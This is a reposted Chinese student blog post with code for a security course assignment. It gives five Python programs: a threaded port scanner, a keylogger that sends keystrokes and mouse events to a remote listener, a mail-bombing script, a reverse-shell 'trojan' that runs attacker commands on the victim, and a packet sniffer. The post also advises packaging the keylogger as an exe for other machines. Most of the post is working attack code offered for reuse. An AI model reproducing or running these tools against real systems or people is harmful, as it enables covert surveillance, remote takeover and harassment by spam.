記專業課程設計
五個題目都挺簡單 題目一稍微麻煩點 涉及到執行緒 因為要考慮到合理分配執行緒資源的問題 以及掃描程序中的連接超時時間的設定不能太大或太小
切記不要直接拿原始碼提交實驗報告 至少自己要有改動 至少加入點自己的思考
題目一:埠掃描
具體要求:對指定的網段和埠進行掃描,
A、 可指定IP地址或是網段,可指定埠范圍;
B、 可設定掃描所需的執行緒數;
C、 對掃描結果進行良好的顯示,
#port-scan.py
#by Xiaohuihui
import socket, threading ,time ,optparse
thread_num = 200
timeout = 5
alive_port = set()
close_port = set()
lock = threading.Lock()
key = 0
def scan_thread(start, end ,ipORdomain):
for i in range(start, end):
if i != 110 and i !=25 :
try:
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(timeout)
sk.connect((ipORdomain,i))
alive_port.add(i)
except Exception:
close_port.add(i)
sk.close()
global key
with lock:
key+=1
else:
continue
def main():
ip_list=[]
port_list=[]
thread_num = 200
usage="usage -o <target host> -p <target ports> -t <scan thread>"
parser=optparse.OptionParser(usage) #創建物件實體
parser.add_option('-o',dest='Host',type='string',help='target host') ##需要的命令列引數
parser.add_option('-p',dest='Ports',type='string',help='target ports')
parser.add_option('-t',dest='thread',type='string',help='scan thread')
(options,args)=parser.parse_args()
Host=options.Host
Ports=options.Ports
thread_num=options.thread
if thread_num == None:
thread_num = 2
if (Host==None)|(Ports==None): ##如果主機和埠都是空的話
print(parser.usage)
exit(0)
if '-' in Host:
ipcl = Host.find('-')
ip_start = Host[0:int(ipcl)]
ip_end = Host[int(ipcl)+1:]
flag = int(ip_start.rfind('.'))
ipfor_begin = ip_start[flag+1:]
ipfor_end = ip_end[flag+1:]
Host = ip_start[0:flag+1]
ip_list=[]
for i in range(int(ip_start[flag+1:]),int(ip_end[flag+1:])+1):
ip_list.append(ip_start[0:flag+1]+str(i))
else:
Host = options.Host
ip_list.append(Host)
if '-' in Ports:
portcl = Ports.find('-')
port_start = int(Ports[0:int(portcl)])
port_end = int(Ports[int(portcl)+1:])
Ports = port_start
for i in range(port_start,port_end+1):
port_list.append(i)
else:
Ports=options.Ports
port_list.append(Ports)
ipORdomain_list = ip_list
port_num = port_list
for ipORdomain in ipORdomain_list:
start_time = time.time()
thread_list = []
for i in range(int(thread_num)):
start =int(port_num[0]) + i*round(len(port_num)/int(thread_num))
end = int(port_num[0]) + (i+1)*(round(len(port_num)/int(thread_num)))
t = threading.Thread(target=scan_thread, args=(start, end ,ipORdomain))
thread_list.append(t)
for t in thread_list:
t.start()
for t in thread_list:
t.join()
print('IP:'+ipORdomain+' alive ports are {}'.format(sorted(alive_port)))
alive_port.clear()
if __name__ == '__main__':
main()
運行效果如下
題目二:鍵盤記錄
具體要求:對被監控系統的鍵盤操作可進行實時的監控,將監視結果發回遠程主機進行查看,
A、 對被監控主機的鍵盤及滑鼠操作進行監控和記錄;
B、 可通過網路介面將監控的結果發回到遠程主機;
C、 將收到的結果進行有效的實時顯示,
題目二需要安裝額外的庫
這里已將python3.7環境所需要的庫檔案分享到如下
需要自取 安裝問題自行百度
(鏈接:https://share.weiyun.com/H1JVsrNa 密碼:stx93q)
還一點需要注意的是 如果在非本機的其他環境進行監控測驗的話,可以用pyinstall將py檔案打包成一個exe檔案,這樣被控機就不需要安裝Hook等其他繁瑣的庫環境了
#client.py
#by Xiaohuihui
import socket
import pythoncom
import PyHook3
import time
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 1216
client.connect((host, port))
def onMouseEvent(event):
# 監聽滑鼠事件
client.send(("\nMessageName:"+event.MessageName).encode())
client.send(("\nTime:"+time.strftime("%Y %H:%M:%S", time.localtime())).encode())
client.send(("\nPosition:"+str(event.Position)).encode())
client.send("\n-----".encode())
return True
def onKeyboardEvent(event):
# 監聽鍵盤事件
client.send(("\nMessageName:"+event.MessageName).encode())
client.send(("\nTime:"+time.strftime("%Y %H:%M:%S", time.localtime())).encode())
client.send(("\nAscii:"+str(int(event.Ascii))+' '+str(chr(event.Ascii))).encode())
client.send(("\nKey:"+event.Key).encode())
client.send("\n-----".encode())
return True
def main():
# 創建一個“鉤子”管理物件
hm = PyHook3.HookManager()
# 監聽所有鍵盤事件
hm.KeyDown = onKeyboardEvent
# 設定鍵盤“鉤子”
hm.HookKeyboard()
# 監聽所有滑鼠事件
hm.MouseAll = onm ouseEvent
# 設定滑鼠“鉤子”
hm.HookMouse()
# 進入回圈,如不手動關閉,程式將一直處于監聽狀態
pythoncom.PumpMessages()
client.close()
if __name__ == "__main__":
main()
#sever.py
#by Xiaohuihui
import socket
socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = 1216
socketserver.bind((host, port))
socketserver.listen(5)
print("等待客戶端連接……")
clientsocket,addr = socketserver.accept()
print("已建立初步連接, 開始資料傳輸……")
while True:
recvmsg = clientsocket.recv(1024)
strData = recvmsg.decode("utf-8")
print("收到:"+strData)
運行效果如下
題目三:發送垃圾郵件
具體要求:撰寫程式發送垃圾郵件到被攻擊的郵箱,
A、 撰寫程式批量發送郵件到被攻擊的郵箱,可設定被攻擊的郵箱地址;
B、 可設定發送的郵件數量;
C、 可設定發送郵件的時間間隔,
#sendmail.py
#by Xiaohuihui
import smtplib
import time
from email.mime.text import MIMEText
smtpserver = "smtp.qq.com"
smtpport = 465
from_mail = "1215499430@qq.com" #這里改為你自己的郵箱
password = "xxxxxxxxxxxxxxxx" # 這里改為你自己的郵箱16位授權碼
content="test"
msg = MIMEText(content)
to_mail=input("請輸入目標郵箱:\n格式為(xxx@qq.com)\n")
cs = int(input("請輸入發送次數:\n"))
sleeptime = int(input("請輸入時間間隔:\n(時間單位秒)\n"))
for i in range(1,cs+1):
time.sleep(sleeptime)
try:
smtp = smtplib.SMTP_SSL(smtpserver,smtpport)
smtp.login(from_mail,password)
smtp.sendmail(from_mail,to_mail,msg.as_string())
except(smtplib.SMTPException) as e:
print(e.message)
finally:
smtp.quit()
print("已成功向指定郵箱發送所有郵件!")
運行效果如下
題目四:簡易木馬
具體要求:撰寫程式對遠程主機進行操控,
A、 被攻擊的主機反向連接攻擊機;
B、 可在被攻擊的主機上執行命令(以命令列的形式,如dir、ls、rm、del等);
C、 將操作的結果顯示到攻擊機上,
#client.py
#by Xiaohuihui
import socket
import os
import sys
import time
baili="127.0.0.1"
port=1216
server=(baili,port)
s=socket.socket()
s.connect(server)
while 1:
dir=os.getcwd()
s.send(dir.encode())
cmd=s.recv(1024).decode()
if cmd=="exit":
break
elif cmd.startswith("cd"):
os.chdir(cmd[2:].strip())
result="切換目錄成功!"
else:
result=os.popen(cmd).read()
if not result:
result="命令執行完畢!"
s.send(result.encode())
time.sleep(1)
s.close()
print("退出!")
#sever.py
#by Xiaohuihui
import socket
import time
server=("0.0.0.0",1216)
s=socket.socket()
s.bind(server)
s.listen(5)
con,addr=s.accept()
print(addr,"shell已反彈回來!")
while 1:
dir=con.recv(1024).decode()
cmd=input(dir+":").strip()
con.send(cmd.encode())
if cmd=="exit":
break
result=con.recv(65365)
print(result.decode())
time.sleep(1)
s.close()
print("退出!")
運行效果如下
題目五:網路資料嗅探
具體要求:撰寫程式對資料包進行捕獲,
A、 對IP層的資料進行相應的捕獲;
B、 可設定要監聽的介面、或可以從默認介面監聽;
C、 對資料的實時顯示包括源地址、目的地址、源埠、目的埠、資料包長度、抓取的時間,
#sniffe-IP.py
#by Xiaohuihui
from scapy.all import *
sniff(iface='WLAN',count=0,prn=lambda x : x.sprintf("{IP:%IP.src%:%IP.sport%-> %IP.dst%:%IP.dport%} IP報文長度%IP.len% 抓取時間 %IP.time%"))
運行效果如下
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/172404.html
標籤:其他